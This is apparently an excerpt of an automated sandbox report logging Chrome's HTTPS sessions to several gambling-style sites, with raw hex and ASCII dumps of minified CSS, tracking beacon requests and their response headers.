                                                                                                                                                          Data Ascii: in-data-v-583e4de6 .76667s linear 1}.hbsd-24[data-v-583e4de6]{top:100%;animation:HongbaoRain-data-v-583e4de6 .8s linear 1;-ms-animation:HongbaoRain-data-v-583e4de6 .8s linear 1;-webkit-animation:HongbaoRain-data-v-583e4de6 .8s linear 1}.hbsd-25[data-v-583
                                                                                                                                                          2024-06-09 22:41:09 UTC16384INData Raw: 70 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 2e 35 72 65 6d 7d 2e 66 69 78 65 64 2d 68 62 2d 77 72 61 70 20 2e 67 72 69 64 5b 64 61 74 61 2d 76 2d 35 38 33 65 34 64 65 36 5d 7b 77 69 64 74 68 3a 31 32 2e 35 25 3b 68 65 69 67 68 74 3a 31 36 2e 36 36 36 36 37 76 68 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 66 69 78 65 64 2d 68 62 2d 77 72 61 70 20 2e 67 72 69 64 20 2e 68 62 5b 64 61 74 61 2d 76 2d 35 38 33 65 34 64 65 36 5d 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 7a 2d 69 6e 64 65 78 3a 38 31 30 30 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 2e 66 69 78 65 64 2d 68 62 2d 77 72 61 70 20 2e 67 72 69 64 20 2e 68 62 2e 73 68 61 6b 65 5b 64 61 74 61 2d 76 2d 35 38 33 65 34 64 65 36
                                                                                                                                                          Data Ascii: p;flex-wrap:wrap;margin-top:1.5rem}.fixed-hb-wrap .grid[data-v-583e4de6]{width:12.5%;height:16.66667vh;position:relative}.fixed-hb-wrap .grid .hb[data-v-583e4de6]{position:absolute;z-index:8100;cursor:pointer}.fixed-hb-wrap .grid .hb.shake[data-v-583e4de6
                                                                                                                                                          2024-06-09 22:41:09 UTC16384INData Raw: 6e 6f 2d 72 65 6d 69 6e 64 20 6c 61 62 65 6c 5b 64 61 74 61 2d 76 2d 38 35 35 62 61 65 38 30 5d 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 31 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 78 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 2e 6d 73 67 2d 62 6f 78 2d 6d 61 69 6e 20 2e 6d 73 67 2d 62 6f 78 2d 74 69 74 6c 65 20 2e 6e 6f 2d 72 65 6d 69 6e 64 20 2e 77 72 61 70 2d 6e 6f 2d 72 65 6d 69 6e 64 20 69 6e 70 75 74 5b 74 79 70 65 3d 63 68 65 63 6b 62 6f 78 5d 5b 64 61 74 61 2d 76 2d 38 35 35 62 61 65 38 30 5d 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 72 69 67 68 74 3a 2d 31 36 70 78 3b 7a 2d 69 6e 64 65 78 3a 2d 31 7d 2e 6d 73 67 2d 62 6f 78 2d 6d 61 69 6e 20 2e 6d 73 67 2d 62 6f 78 2d 74 69 74 6c 65 20 2e 6e 6f 2d 72 65 6d 69 6e 64
                                                                                                                                                          Data Ascii: no-remind label[data-v-855bae80]{margin-right:10px;font-size:18px;cursor:pointer}.msg-box-main .msg-box-title .no-remind .wrap-no-remind input[type=checkbox][data-v-855bae80]{position:relative;right:-16px;z-index:-1}.msg-box-main .msg-box-title .no-remind
                                                                                                                                                          2024-06-09 22:41:09 UTC16384INData Raw: 78 3a 35 30 30 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 2e 33 73 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 70 72 65 2d 6c 6f 67 69 6e 20 2e 63 6f 6d 6d 6f 6e 5f 6d 61 73 6b 7b 7a 2d 69 6e 64 65 78 3a 39 30 32 7d 2e 63 6f 6d 6d 6f 6e 5f 66 6c 65 78 2d 63 65 6e 74 65 72 7b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 7d 2e 66 61 64 65 2d 65 6e 74 65 72 2d 61 63 74 69
                                                                                                                                                          Data Ascii: x:500;transition:.3s;-ms-flex-pack:center;justify-content:center}.pre-login .common_mask{z-index:902}.common_flex-center{display:-ms-flexbox;display:flex;-ms-flex-pack:center;justify-content:center;-ms-flex-align:center;align-items:center}.fade-enter-acti
                                                                                                                                                          2024-06-09 22:41:09 UTC16384INData Raw: 65 72 2d 72 6f 75 6e 64 20 2e 70 6c 61 79 5f 70 61 75 73 65 5f 62 75 74 74 6f 6e 2c 2e 73 6b 69 74 74 65 72 2d 72 6f 75 6e 64 20 2e 70 72 65 76 5f 62 75 74 74 6f 6e 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 70 63 2f 69 6d 61 67 65 2d 70 63 2f 73 6b 69 74 74 65 72 2f 73 70 72 69 74 65 2d 72 6f 75 6e 64 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 34 37 70 78 20 61 75 74 6f 7d 2e 73 6b 69 74 74 65 72 2d 72 6f 75 6e 64 20 2e 70 72 65 76 5f 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 20 30 3b 77 69 64 74 68 3a 32 33 70 78 3b 68 65 69 67 68 74 3a 34 37 70 78 3b 6c 65 66 74 3a 2d 32 33 70 78 7d 2e 73 6b 69 74 74 65 72 2d
                                                                                                                                                          Data Ascii: er-round .play_pause_button,.skitter-round .prev_button{display:block;background:url(/pc/image-pc/skitter/sprite-round.png) no-repeat;background-size:47px auto}.skitter-round .prev_button{background-position:0 0;width:23px;height:47px;left:-23px}.skitter-
                                                                                                                                                          2024-06-09 22:41:09 UTC16384INData Raw: 2f 70 63 2f 69 6d 61 67 65 2d 70 63 2f 6e 65 77 73 2f 35 38 2e 70 6e 67 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 7d 2e 6e 65 77 73 2d 68 65 61 64 65 72 2e 6e 65 77 73 2d 69 63 6f 6e 2d 35 39 5b 64 61 74 61 2d 76 2d 31 63 35 38 62 37 66 36 5d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 70 63 2f 69 6d 61 67 65 2d 70 63 2f 6e 65 77 73 2f 35 39 2e 70 6e 67 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 7d 2e 6e 65 77 73 2d 68 65 61 64 65 72 2e 6e 65 77 73 2d 69 63 6f 6e 2d 36 30 5b 64 61 74 61 2d 76 2d 31 63 35 38 62 37 66 36 5d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 70 63 2f 69 6d 61 67 65 2d 70 63 2f 6e 65 77 73 2f 36
                                                                                                                                                          Data Ascii: /pc/image-pc/news/58.png);background-repeat:no-repeat}.news-header.news-icon-59[data-v-1c58b7f6]{background-image:url(/pc/image-pc/news/59.png);background-repeat:no-repeat}.news-header.news-icon-60[data-v-1c58b7f6]{background-image:url(/pc/image-pc/news/6
                                                                                                                                                          2024-06-09 22:41:09 UTC16384INData Raw: 68 74 53 70 65 65 64 49 6e 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 65 61 73 65 2d 6f 75 74 7d 40 6b 65 79 66 72 61 6d 65 73 20 6c 69 67 68 74 53 70 65 65 64 4f 75 74 7b 30 25 7b 6f 70 61 63 69 74 79 3a 31 7d 74 6f 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 33 64 28 31 30 30 25 2c 30 2c 30 29 20 73 6b 65 77 58 28 33 30 64 65 67 29 3b 6f 70 61 63 69 74 79 3a 30 7d 7d 2e 6c 69 67 68 74 53 70 65 65 64 4f 75 74 7b 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 6c 69 67 68 74 53 70 65 65 64 4f 75 74 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 65 61 73 65 2d 69 6e 7d 40 6b 65 79 66 72 61 6d 65 73 20 72 6f 74 61 74 65 49 6e 7b 30 25 7b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72
                                                                                                                                                          Data Ascii: htSpeedIn;animation-timing-function:ease-out}@keyframes lightSpeedOut{0%{opacity:1}to{transform:translate3d(100%,0,0) skewX(30deg);opacity:0}}.lightSpeedOut{animation-name:lightSpeedOut;animation-timing-function:ease-in}@keyframes rotateIn{0%{transform-or
                                                                                                                                                          2024-06-09 22:41:09 UTC16384INData Raw: 6f 62 62 79 2f 6d 65 6e 75 2f 77 7a 2e 70 6e 67 29 7d 2e 67 61 6d 65 2d 6c 6f 62 62 79 2d 6e 65 77 20 2e 6e 61 76 20 2e 70 72 6f 76 69 64 65 72 2d 73 6c 69 64 65 20 2e 73 6c 69 64 65 2d 69 74 65 6d 20 2e 77 72 61 70 20 2e 74 68 69 72 64 2d 6d 65 6e 75 2e 62 73 2e 63 61 72 64 5b 64 61 74 61 2d 76 2d 65 33 31 35 62 65 31 63 5d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 70 63 2f 69 6d 61 67 65 2d 70 63 2f 63 61 72 64 2f 6c 6f 62 62 79 2f 6d 65 6e 75 2f 62 73 2e 70 6e 67 29 7d 2e 67 61 6d 65 2d 6c 6f 62 62 79 2d 6e 65 77 20 2e 6e 61 76 20 2e 70 72 6f 76 69 64 65 72 2d 73 6c 69 64 65 20 2e 73 6c 69 64 65 2d 69 74 65 6d 20 2e 77 72 61 70 20 2e 74 68 69 72 64 2d 6d 65 6e 75 2e 69 64 6e 2e 63 61 72 64 5b 64 61 74 61 2d 76 2d 65 33 31 35
                                                                                                                                                          Data Ascii: obby/menu/wz.png)}.game-lobby-new .nav .provider-slide .slide-item .wrap .third-menu.bs.card[data-v-e315be1c]{background-image:url(/pc/image-pc/card/lobby/menu/bs.png)}.game-lobby-new .nav .provider-slide .slide-item .wrap .third-menu.idn.card[data-v-e315


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          316192.168.2.550075103.117.134.214434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:09 UTC617OUTGET /zb-cloud/stat.do?pv=ajax&pa=host.info&domain=yh8613.cc&terminal=1&r=3506563745 HTTP/1.1
                                                                                                                                                          Host: ocsapi-lc.tingmeikj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Origin: https://yh8613.cc
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://yh8613.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:09 UTC17INHTTP/1.1 200 OK
                                                                                                                                                          2024-06-09 22:41:09 UTC23INData Raw: 53 65 72 76 65 72 3a 20 54 65 6e 67 69 6e 65 2f 32 2e 33 2e 30 0d 0a
                                                                                                                                                          Data Ascii: Server: Tengine/2.3.0
                                                                                                                                                          2024-06-09 22:41:09 UTC37INData Raw: 44 61 74 65 3a 20 53 75 6e 2c 20 30 39 20 4a 75 6e 20 32 30 32 34 20 32 32 3a 34 31 3a 30 39 20 47 4d 54 0d 0a
                                                                                                                                                          Data Ascii: Date: Sun, 09 Jun 2024 22:41:09 GMT
                                                                                                                                                          2024-06-09 22:41:09 UTC40INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a
                                                                                                                                                          Data Ascii: Content-Type: text/plain;charset=utf-8
                                                                                                                                                          2024-06-09 22:41:09 UTC23INData Raw: 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a
                                                                                                                                                          Data Ascii: Vary: Accept-Encoding
                                                                                                                                                          2024-06-09 22:41:09 UTC23INData Raw: 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a
                                                                                                                                                          Data Ascii: Vary: Accept-Encoding
                                                                                                                                                          2024-06-09 22:41:09 UTC16INData Raw: 61 70 69 2d 65 6c 61 70 73 65 64 3a 20 35 0d 0a
                                                                                                                                                          Data Ascii: api-elapsed: 5
                                                                                                                                                          2024-06-09 22:41:09 UTC23INData Raw: 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a
                                                                                                                                                          Data Ascii: Vary: Accept-Encoding
                                                                                                                                                          2024-06-09 22:41:09 UTC34INData Raw: 78 2d 73 65 72 76 65 72 3a 20 41 6b 61 6d 61 69 4e 65 74 53 74 6f 72 61 67 65 28 6a 70 31 35 29 0d 0a
                                                                                                                                                          Data Ascii: x-server: AkamaiNetStorage(jp15)
                                                                                                                                                          2024-06-09 22:41:09 UTC32INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a
                                                                                                                                                          Data Ascii: Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:09 UTC82INData Raw: 58 2d 56 69 61 3a 20 31 2e 31 20 61 77 73 3a 6a 70 20 28 43 64 6e 20 43 61 63 68 65 20 53 65 72 76 65 72 20 56 32 2e 30 29 2c 20 31 2e 31 20 6f 63 73 61 70 69 3a 30 30 20 28 43 64 6e 20 43 61 63 68 65 20 53 65 72 76 65 72 20 56 32 2e 30 29 0d 0a
                                                                                                                                                          Data Ascii: X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          317192.168.2.55008190.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:09 UTC401OUTGET /fiximg/ac-20200404/fileupload/ll12/202312/202312180557505.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:09 UTC534INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:09 GMT
                                                                                                                                                          Content-Type: application/json
                                                                                                                                                          Content-Length: 27136
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE4[1],EU-GER-frankfurt-EDGE5-CACHE6[0,TCP_HIT,0],EU-FRA-paris-GLOBAL1-CACHE5[6],EU-FRA-paris-GLOBAL1-CACHE14[0,TCP_HIT,4],1.1 google
                                                                                                                                                          X-CCDN-Expires: 790132
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 284edf80511b9c2d48fd7f1ef5bafa87
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          Age: 9
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:09 UTC15850INData Raw: 75 39 6d 45 50 55 47 69 48 6c 45 6d 54 43 67 74 46 76 45 6e 33 71 50 46 54 30 2b 39 34 4e 63 74 6c 38 4d 42 72 4b 4d 62 35 67 33 69 36 78 44 54 79 76 47 31 53 46 6e 38 31 37 74 31 36 34 4e 6d 5a 4d 6d 4d 46 30 6f 68 37 36 32 47 64 30 42 41 70 4a 66 52 72 68 35 51 49 33 34 33 71 4e 37 74 65 4f 6e 76 42 56 5a 4e 58 6f 73 79 6f 64 75 75 70 76 6f 70 78 4e 72 66 59 6d 79 46 67 66 61 56 70 72 2f 6c 69 2f 68 34 35 56 75 43 41 74 62 6b 66 4e 52 51 4e 33 4f 4a 4a 4e 58 7a 49 4e 54 70 36 52 41 6d 39 75 2f 41 42 43 37 70 78 56 6d 31 73 79 55 79 43 49 5a 41 38 4e 68 67 70 72 63 58 32 53 6c 42 77 63 6b 46 49 6b 44 45 48 4f 6c 38 4c 44 51 31 78 66 74 47 45 69 31 58 68 34 50 66 6f 53 76 39 6b 78 4b 72 61 6d 4c 54 34 70 65 33 6f 6e 48 4a 53 6a 51 2b 6e 6e 35 72 61 69 45
                                                                                                                                                          Data Ascii: u9mEPUGiHlEmTCgtFvEn3qPFT0+94Nctl8MBrKMb5g3i6xDTyvG1SFn817t164NmZMmMF0oh762Gd0BApJfRrh5QI343qN7teOnvBVZNXosyoduupvopxNrfYmyFgfaVpr/li/h45VuCAtbkfNRQN3OJJNXzINTp6RAm9u/ABC7pxVm1syUyCIZA8NhgprcX2SlBwckFIkDEHOl8LDQ1xftGEi1Xh4PfoSv9kxKramLT4pe3onHJSjQ+nn5raiE
                                                                                                                                                          2024-06-09 22:41:09 UTC11286INData Raw: 42 4e 76 48 56 63 53 45 32 69 78 2b 71 54 70 49 74 41 6d 44 52 69 54 62 78 31 58 45 68 4e 6f 73 66 71 6b 36 53 4c 51 4a 67 30 59 6b 32 38 64 56 78 49 54 61 4c 48 36 70 4f 6b 69 30 43 59 4e 47 4a 4e 76 48 56 63 53 45 32 69 78 2b 71 54 70 49 74 41 6d 44 52 69 54 62 78 31 58 45 68 4e 6f 73 66 71 6b 36 53 4c 51 4a 67 30 59 6b 32 38 64 56 78 49 54 61 4c 48 36 70 4f 6b 69 30 43 59 4e 47 4a 4e 76 48 56 63 53 45 32 69 78 2b 71 54 70 49 74 41 6d 44 52 69 51 4d 6f 4d 73 6a 68 34 71 75 55 46 54 78 6c 39 70 36 5a 31 62 55 32 38 64 56 78 49 54 61 4c 48 36 70 4f 6b 69 30 43 59 4e 47 4a 4e 76 48 56 63 53 45 32 69 78 2b 71 54 70 49 74 41 6d 44 52 69 54 62 78 31 58 45 68 4e 6f 73 66 71 6b 36 53 4c 51 4a 67 30 59 6b 32 38 64 56 78 49 54 61 4c 48 36 70 4f 6b 69 30 43 59 4e
                                                                                                                                                          Data Ascii: BNvHVcSE2ix+qTpItAmDRiTbx1XEhNosfqk6SLQJg0Yk28dVxITaLH6pOki0CYNGJNvHVcSE2ix+qTpItAmDRiTbx1XEhNosfqk6SLQJg0Yk28dVxITaLH6pOki0CYNGJNvHVcSE2ix+qTpItAmDRiQMoMsjh4quUFTxl9p6Z1bU28dVxITaLH6pOki0CYNGJNvHVcSE2ix+qTpItAmDRiTbx1XEhNosfqk6SLQJg0Yk28dVxITaLH6pOki0CYN


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          318192.168.2.5500793.165.113.624434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:09 UTC376OUTGET /ocs/cc.png?1717972858650 HTTP/1.1
                                                                                                                                                          Host: ocsapi-aka.blackkhaki918.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:10 UTC486INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 332
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:09 GMT
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          Api-Elapsed: 0.0000
                                                                                                                                                          X-Node: outer
                                                                                                                                                          X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                                                          Via: 1.1 43f36fe628062371b0e7725538b714ac.cloudfront.net (CloudFront)
                                                                                                                                                          X-Amz-Cf-Pop: CDG50-P3
                                                                                                                                                          X-Amz-Cf-Id: dgXEvwmZr2UcT2PjZAKagIjT6DSuCVKHibv0OpXn1zAHoZgTuyjuOA==
                                                                                                                                                          2024-06-09 22:41:10 UTC332INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff c0 00 0b 08 00 01 00 01 01 01 11 00 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93
                                                                                                                                                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          319192.168.2.55008018.66.147.1214434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:09 UTC372OUTGET /ocs/cc.png?1717972858649 HTTP/1.1
                                                                                                                                                          Host: ocsapi-aws.bakeddove.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:10 UTC486INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 332
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:09 GMT
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          Api-Elapsed: 0.0000
                                                                                                                                                          X-Node: outer
                                                                                                                                                          X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                                                          Via: 1.1 b2ba97e9b6a83eff85433dad7f6e6288.cloudfront.net (CloudFront)
                                                                                                                                                          X-Amz-Cf-Pop: FRA60-P4
                                                                                                                                                          X-Amz-Cf-Id: 653NFAS3cbbiyHDA8tNDoyBZCOEppSRDKpaUwvbQqa8OtoCX3IXOiA==
                                                                                                                                                          2024-06-09 22:41:10 UTC332INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff c0 00 0b 08 00 01 00 01 01 01 11 00 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93
                                                                                                                                                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          320192.168.2.550077170.33.9.2274434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:09 UTC507OUTGET /zb-cloud/stat.do?pv=ajax&pa=host.info&domain=wns732.cc&terminal=1&r=3425276221 HTTP/1.1
                                                                                                                                                          Host: ahd-ocssn.qqxgo.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          Cookie: aliyungf_tc=3de529fcf893d6d3ee212d9780b2d6d818dae7d7247c306b9d3885f4ac9f9c38
                                                                                                                                                          2024-06-09 22:41:10 UTC399INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:10 GMT
                                                                                                                                                          Content-Type: text/plain;charset=utf-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Tengine/2.3.0
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          api-elapsed: 5
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          x-server: AkamaiNetStorage(jp15)
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
